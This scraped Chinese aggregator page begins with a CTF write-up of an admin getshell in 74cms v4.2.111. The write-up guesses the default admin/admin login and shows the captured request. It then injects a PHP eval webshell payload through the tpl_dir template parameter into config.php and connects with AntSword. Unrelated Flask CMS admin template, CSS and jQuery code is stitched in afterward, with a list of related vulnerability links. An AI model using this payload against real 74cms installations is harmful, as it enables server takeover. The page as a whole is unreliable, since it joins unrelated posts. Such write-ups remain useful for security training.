骑士CMS01 74cms v4.2.111 后台getshell漏洞复现

Posted 白塔河冲浪手

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了骑士CMS01 74cms v4.2.111 后台getshell漏洞复现相关的知识,希望对你有一定的参考价值。

题目地址:

青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF

进入环境

 拉到最下面查看网站cms版本

百度搜索

 找个poc复现一下74CMS_v4.2.1-v4.2.129后台Getshell_FLy_鹏程万里的博客-CSDN博客

先进入网站后台/index.php?m=admin&c=index&a=login

 输入账号aaa回显管理员账号不存在,试试admin

 猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码

 302跳转登录成功密码就是admin

进入后台找到工具=>风格模板=>可用模板,抓包

GET /index.php?m=admin&c=tpl&a=set&tpl_dir=default HTTP/1.1
Host: 8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081/index.php?m=admin&c=tpl&a=index
Cookie: Hm_lvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664077379,1664087665,1664100554; Hm_lpvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664100567; td_cookie=1833576663; PHPSESSID=73nciph5rtj95ti9o99qd92781; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1

修改tpl_dir的值为

','a',eval($_POST['cmd']),'

然后访问/Application/Home/Conf/config.php

 蚁剑连接找到flag

 

 

九十五:CMS系统之cms后台模板渲染

 

定义一个宏,用于渲染static文件的时候,只需要传文件名就可以,上下两个“-”是解决渲染的时候源代码换行的情况

技术图片

{% macro static(filename) -%}
{{ url_for(‘static‘, filename=filename) }}
{%- endmacro %}

技术图片

{% from ‘common/_macros.html‘ import static %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>标题</title>
<script src="http://cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>
<link href="http://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
<script src="http://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="{{ static(‘css/cms/cms_base.css‘) }}">
<script src="{{ static(‘js/cms/cms_base.js‘) }}"></script>
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">CMS管理系统</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav navbar-right">
<li><a href="#">user<span>[超级管理员]</span></a></li>
<li><a href="#">注销</a></li>
</ul>
<form class="navbar-form navbar-right">
<input type="text" class="form-control" placeholder="查找...">
</form>
</div>
</div>
</nav>

<div class="container-fluid">
<div class="row">
<div class="col-sm-3 col-md-2 sidebar">
<ul class="nav-sidebar">
<li class="unfold"><a href="#">首页</a></li>
<li class="profile-li">
<a href="#">个人中心<span></span></a>
<ul class="subnav">
<li><a href="#">个人信息</a></li>
<li><a href="#">修改密码</a></li>
<li><a href="#">修改邮箱</a></li>
</ul>
</li>

<li class="nav-group post-manage"><a href="#">帖子管理</a></li>
<li class="comments-manage"><a href="#">评论管理</a></li>
<li class="board-manage"><a href="#">板块管理</a></li>

<li class="nav-group user-manage"><a href="#">用户管理</a></li>
<li class="role-manage"><a href="#">组管理</a></li>

<li class="nav-group cmsuser-manage"><a href="#">CMS用户管理</a></li>
<li class="cmsrole-manage"><a href="#">CMS组管理</a></li>
</ul>
</div>
<div class="col-sm-9 col-sm-offset-3 col-md-10 col-md-offset-2 main">
<h1>标题</h1>
<div class="main_content">
整体内容
</div>
</div>
</div>
</div>
</body>
</html>

css

技术图片

/*
* Base structure
*/

/* Move down content because we have a fixed navbar that is 50px tall */
body {
padding-top: 50px;
overflow: hidden;
}

/*
* Global add-ons
*/

.sub-header {
padding-bottom: 10px;
border-bottom: 1px solid #eee;
}

/*
* Top navigation
* Hide default border to remove 1px line.
*/
.navbar-fixed-top {
border: 0;
}

/*
* Sidebar
*/

/* Hide for mobile, show later */
.sidebar {
display: none;
}
@media (min-width: 768px) {
.sidebar {
position: fixed;
top: 51px;
bottom: 0;
left: 0;
z-index: 1000;
display: block;
padding: 20px;
overflow-x: hidden;
overflow-y: auto; /* Scrollable contents if viewport is shorter than content. */
background-color: #363a47;
border-right: 1px solid #eee;
margin-top: -1px;
}
}

.nav-sidebar{
padding: 5px 0;
margin-left: -20px;
margin-right: -20px;
}

.nav-sidebar > li{
background: #494f60;
border-bottom: 1px solid #363a47;
border-top: 1px solid #666;
line-height: 35px;
}

.nav-sidebar > li > a {
background: #494f60;
color: #9b9fb1;
margin-left: 25px;
display: block;
}

.nav-sidebar > li a span{
float: right;
width: 10px;
height:10px;
border-style: solid;
border-color: #9b9fb1 #9b9fb1 transparent transparent;
border-width: 1px;
transform: rotate(45deg);
position: relative;
top: 10px;
margin-right: 10px;
}

.nav-sidebar > li > a:hover{
color: #fff;
background: #494f60;
text-decoration: none;
}

.nav-sidebar > li > .subnav{
display: none;
}

.nav-sidebar > li.unfold{
background: #494f60;
}

.nav-sidebar > li.unfold > .subnav{
display: block;
}

.nav-sidebar > li.unfold > a{
color: #db4055;
}

.nav-sidebar > li.unfold > a span{
transform: rotate(135deg);
top: 5px;
border-color: #db4055 #db4055 transparent transparent;
}

.subnav{
padding-left: 10px;
padding-right: 10px;
background: #363a47;
overflow: hidden;
}

.subnav li{
overflow: hidden;
margin-top: 10px;
line-height: 25px;
height: 25px;
}

.subnav li.active{
background: #db4055;
}

.subnav li a{
/*display: block;*/
color: #9b9fb1;
padding-left: 30px;
height:25px;
line-height: 25px;
}

.subnav li a:hover{
color: #fff;
}

.nav-group{
margin-top: 10px;
}


.main {
padding: 20px;
}
@media (min-width: 768px) {
.main {
padding-right: 40px;
padding-left: 40px;
}
}
.main .page-header {
margin-top: 0;
}


/*
* Placeholder dashboard ideas
*/

.placeholders {
margin-bottom: 30px;
text-align: center;
}
.placeholders h4 {
margin-bottom: 0;
}
.placeholder {
margin-bottom: 20px;
}
.placeholder img {
display: inline-block;
border-radius: 50%;
}

.main_content{
margin-top: 20px;
}



.top-group{
padding: 5px 10px;
border-radius: 2px;
background: #ecedf0;
overflow: hidden;
}

js

技术图片

$(function () {
$(‘.nav-sidebar>li>a‘).click(function (event) {
var that = $(this);
if(that.children(‘a‘).attr(‘href‘) == ‘#‘){
event.preventDefault();
}
if(that.parent().hasClass(‘unfold‘)){
that.parent().removeClass(‘unfold‘);
}else{
that.parent().addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}
console.log(‘coming....‘);
});

$(‘.nav-sidebar a‘).mouseleave(function () {
$(this).css(‘text-decoration‘,‘none‘);
});
});


$(function () {
var url = window.location.href;
if(url.indexOf(‘profile‘) >= 0){
var profileLi = $(‘.profile-li‘);
profileLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
profileLi.children(‘.subnav‘).children().eq(0).addClass(‘active‘).siblings().removeClass(‘active‘);
} else if(url.indexOf(‘resetpwd‘) >= 0){
var profileLi = $(‘.profile-li‘);
profileLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
profileLi.children(‘.subnav‘).children().eq(1).addClass(‘active‘).siblings().removeClass(‘active‘);
} else if(url.indexOf(‘resetemail‘) >= 0){
var profileLi = $(‘.profile-li‘);
profileLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
profileLi.children(‘.subnav‘).children().eq(2).addClass(‘active‘).siblings().removeClass(‘active‘);
} else if(url.indexOf(‘posts‘) >= 0){
var postManageLi = $(‘.post-manage‘);
postManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘boards‘) >= 0){
var boardManageLi = $(‘.board-manage‘);
boardManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘permissions‘) >= 0){
var permissionManageLi = $(‘.permission-manage‘);
permissionManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘roles‘) >= 0){
var roleManageLi = $(‘.role-manage‘);
roleManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘users‘) >= 0){
var userManageLi = $(‘.user-manage‘);
userManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘cmsuser_manage‘) >= 0){
var cmsuserManageLi = $(‘.cmsuser-manage‘);
cmsuserManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘cmsrole_manage‘) >= 0){
var cmsroleManageLi = $(‘.cmsrole-manage‘);
cmsroleManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}else if(url.indexOf(‘comments‘) >= 0) {
var commentsManageLi = $(‘.comments-manage‘);
commentsManageLi.addClass(‘unfold‘).siblings().removeClass(‘unfold‘);
}
});

技术图片

技术图片

 

以上是关于骑士CMS01 74cms v4.2.111 后台getshell漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

74cms_v3.5.1.20141128 后台宽字节注入漏洞(iconv引发)

怎么修复网站漏洞 骑士cms的漏洞修复方案

怎么修复网站漏洞 骑士cms的漏洞修复方案

苹果CMS骑士快跑主题模板

漏洞|74cms 3.6 前台SQL注入+Python脚本小练习

74cms v5.0.1 前台sql注⼊复现